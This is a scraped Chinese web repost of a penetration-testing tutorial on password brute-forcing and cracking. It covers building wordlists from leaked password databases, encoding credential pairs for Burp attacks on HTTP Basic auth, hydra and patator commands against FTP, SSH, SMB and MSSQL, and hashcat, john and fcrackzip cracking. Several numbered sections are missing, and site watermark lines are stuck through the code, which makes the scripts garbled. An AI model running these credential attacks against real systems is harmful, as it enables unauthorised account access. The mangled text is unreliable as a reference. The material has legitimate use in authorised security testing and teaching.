安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > 渗透测试中的密码扫描与破解技巧

渗透测试中的密码扫描与破解技巧

时间:2015-07-27来源:91ri.org 作者:le4f点击:
0x00 前言 一次测试的过程总会涉及到”密码”与”加解密”.在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到⽹网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被

0x00 前言
一次测试的过程总会涉及到”密码”与”加解密”.在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到⽹网络设 备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘.以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误,还望不吝 赐教.
0x01 整理一份优秀的字典
想破解密码,要求我们已经”拥有”别人的密码.字典在口令扫描尝试过程中的重要性不言而喻.要整理一份优秀的字典,不妨参考各大网站泄漏数据库,将密码(明文)字段收集后,依出现频率先后生成字典.
一个demo脚本:

//本文来自安云网

//本文来自安云网

//内容来自AnYun.ORG

//内容来自安云网

Default

//内容来自安云网

//内容来自AnYun.ORG

//本文来自安云网

//内容来自AnYun.ORG

//本文来自安云网

1

//内容来自安云网

2 //内容来自AnYun.ORG

3 //本文来自安云网

4

//本文来自安云网

5

//本文来自安云网

6 //内容来自AnYun.ORG

7

//本文来自安云网

8

//内容来自AnYun.ORG

9

//本文来自安云网

10

//内容来自安云网

11 //内容来自安云网

12

//内容来自AnYun.ORG

#!/bin/bash/python

//内容来自AnYun.ORG

import sys

//内容来自安云网

from collections import Counter //内容来自安云网

file = open(sys.argv[1], 'r') //本文来自安云网

readlist = []

//内容来自安云网

count_times = []

//内容来自AnYun.ORG

for line in file.readlines():

//内容来自AnYun.ORG

line = line.strip('\r\n ') //本文来自安云网

readlist.append(line)

//内容来自安云网

sortlist = Counter(readlist).most_common() //内容来自安云网

for line in sortlist: //本文来自安云网

print line[0] //本文来自安云网

//内容来自安云网

//内容来自AnYun.ORG

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自AnYun.ORG

Default //内容来自安云网

//本文来自安云网

//内容来自AnYun.ORG

//内容来自AnYun.ORG

//内容来自AnYun.ORG

1

//本文来自安云网

HTTP/1.1 401 Authorization Required

//内容来自安云网

//本文来自安云网

//本文来自安云网

抓包可以看到,以默认用户名admin,默认密码admin登陆路由,HTTP Header多的部分像是这样

//本文来自安云网

//内容来自安云网

//内容来自安云网

//内容来自安云网

Default //内容来自AnYun.ORG

//本文来自安云网

//内容来自AnYun.ORG

//内容来自安云网

//本文来自安云网

1

//本文来自安云网

Authorization: Basic YWRtaW46YWRtaW4=

//内容来自安云网

//内容来自安云网

//内容来自安云网

渗透测试中的密码扫描与破解技巧//内容来自AnYun.ORG

//本文来自安云网

Default //内容来自安云网

//本文来自安云网

//内容来自安云网

//本文来自安云网

1 //内容来自AnYun.ORG

2 //本文来自安云网

3

//本文来自安云网

4

//内容来自安云网

5 //本文来自安云网

6

//内容来自AnYun.ORG

7

//内容来自安云网

8 //内容来自AnYun.ORG

9 //内容来自安云网

10

//本文来自安云网

11

//本文来自安云网

12

//本文来自安云网

13 //本文来自安云网

14

//内容来自安云网

15 //内容来自安云网

16 //内容来自安云网

17 //内容来自AnYun.ORG

18 //内容来自AnYun.ORG

#!/usr/bin/python

//内容来自安云网

import os.path,sys,base64

//内容来自AnYun.ORG

userfile = raw_input("input usr file:")

//内容来自安云网

passfile = raw_input("input pwd file:")

//内容来自安云网

outputfile = raw_input("input out file:")

//本文来自安云网

outputfile = open(outputfile, "w") //内容来自AnYun.ORG

userInfile = open(userfile)

//本文来自安云网

passInfile = open(passfile) //内容来自安云网

userLines = userInfile.readlines()

//本文来自安云网

passLines = passInfile.readlines() //本文来自安云网

for userLine in userLines: //内容来自安云网

for passLine in passLines:

//内容来自安云网

combinedLine = userLine.strip() + ':' + passLine.strip()

//内容来自安云网

print combinedLine

//内容来自AnYun.ORG

outputfile.write(base64.b64encode(combinedLine) + '\n')

//内容来自安云网

userInfile.close()

//本文来自安云网

passInfile.close()

//内容来自安云网

outputfile.close()

//内容来自安云网

//本文来自安云网

//本文来自安云网

生成字典后以Burp爆破即可 //本文来自安云网

渗透测试中的密码扫描与破解技巧//内容来自AnYun.ORG

Default //内容来自安云网

//本文来自安云网

//内容来自安云网

//内容来自安云网

//内容来自安云网

1 //内容来自AnYun.ORG

hydra -L user.txt -P pass.txt -F http://demourl:2048/auth //内容来自AnYun.ORG

//内容来自安云网

//本文来自安云网

渗透测试中的密码扫描与破解技巧//内容来自AnYun.ORG

//本文来自安云网

Default //内容来自安云网

//内容来自安云网

//内容来自安云网

//内容来自安云网

//内容来自AnYun.ORG

1 //内容来自AnYun.ORG

其中-L-P大写均为挂载字典,-F表示全局一旦发现合法用户密码即停止破解,亦可加入-t参数指定线程数. //内容来自安云网

//内容来自安云网

//内容来自AnYun.ORG

0x06 服务密码破解
密码枚举离不开服务,对常见服务如FTP/SSH/TELNET/POP3/1433等的破解枚举,资料已经很齐备,以下仅简要记录命令
FTP //本文来自安云网

//本文来自安云网

//内容来自安云网

//内容来自AnYun.ORG

Default //内容来自AnYun.ORG

//内容来自AnYun.ORG

//本文来自安云网

//本文来自安云网

//本文来自安云网

1

//内容来自安云网

hydra -L user.txt -P pass.txt -F ftp://127.0.0.1:21

//内容来自AnYun.ORG

//内容来自安云网

//内容来自安云网

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自AnYun.ORG

Default

//内容来自AnYun.ORG

//本文来自安云网

//本文来自安云网

//本文来自安云网

//内容来自安云网

1 //内容来自安云网

hydra -L user.txt -P pass.txt -F ssh://127.0.0.1:22

//本文来自安云网

//本文来自安云网

//本文来自安云网

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自AnYun.ORG

Default

//内容来自安云网

//内容来自安云网

//本文来自安云网

//本文来自安云网

//本文来自安云网

1

//本文来自安云网

patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.' //内容来自安云网

//本文来自安云网

//内容来自安云网

渗透测试中的密码扫描与破解技巧//内容来自安云网

//本文来自安云网

Default

//内容来自AnYun.ORG

//内容来自安云网

//内容来自AnYun.ORG

//内容来自AnYun.ORG

//内容来自AnYun.ORG

1 //本文来自安云网

hydra -L user.txt -P pass.txt -F smb://127.0.0.1 //内容来自安云网

//本文来自安云网

//本文来自安云网

渗透测试中的密码扫描与破解技巧//内容来自AnYun.ORG

//内容来自安云网

Default //本文来自安云网

//内容来自AnYun.ORG

//本文来自安云网

//内容来自安云网

//本文来自安云网

1

//内容来自AnYun.ORG

hydra -L user.txt -P pass.txt -F mssql://127.0.0.1:1433

//内容来自安云网

//内容来自安云网

//内容来自安云网

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自AnYun.ORG

Default

//内容来自AnYun.ORG

//内容来自安云网

//内容来自安云网

//内容来自AnYun.ORG

//本文来自安云网

1

//内容来自安云网

python cupp.py -i //本文来自安云网

//内容来自AnYun.ORG

//内容来自AnYun.ORG

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自安云网

Default

//内容来自安云网

//内容来自安云网

//本文来自安云网

//内容来自AnYun.ORG

//内容来自AnYun.ORG

1 //内容来自AnYun.ORG

hashcat -m1800 -a3 hashdumpedfile --pw-min=7 --pw-max=11 "hahaha?l?l?l?l" //内容来自AnYun.ORG

//内容来自AnYun.ORG

//内容来自安云网

几秒钟的时间,得到了密码明文

//内容来自AnYun.ORG

渗透测试中的密码扫描与破解技巧//本文来自安云网

Default //内容来自AnYun.ORG

//内容来自安云网

//内容来自安云网

//内容来自安云网

//本文来自安云网

1

//本文来自安云网

john -w:gen_wordlist.txt hash //本文来自安云网

//内容来自AnYun.ORG

//内容来自AnYun.ORG

渗透测试中的密码扫描与破解技巧//内容来自安云网

//内容来自AnYun.ORG

Default //内容来自安云网

//内容来自安云网

//内容来自AnYun.ORG

//本文来自安云网

1 //内容来自AnYun.ORG

fcrackzip -b -v -c a -l 1-4 -u 1.zip

//本文来自安云网

//本文来自安云网

//本文来自安云网

其中,-b指定暴力破解,-v显示详细信息,-c a指定密码为纯字母,-l 1-4指定密码长度位1-4位,-u指使用可能的密码进行解压缩测试(加上,否则会出现很多干扰密码)

//内容来自AnYun.ORG

渗透测试中的密码扫描与破解技巧

//本文来自安云网

关于其他文件密码的破解,各位看官如有高效的工具,还望拿出来分享之. ;) //内容来自安云网


//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容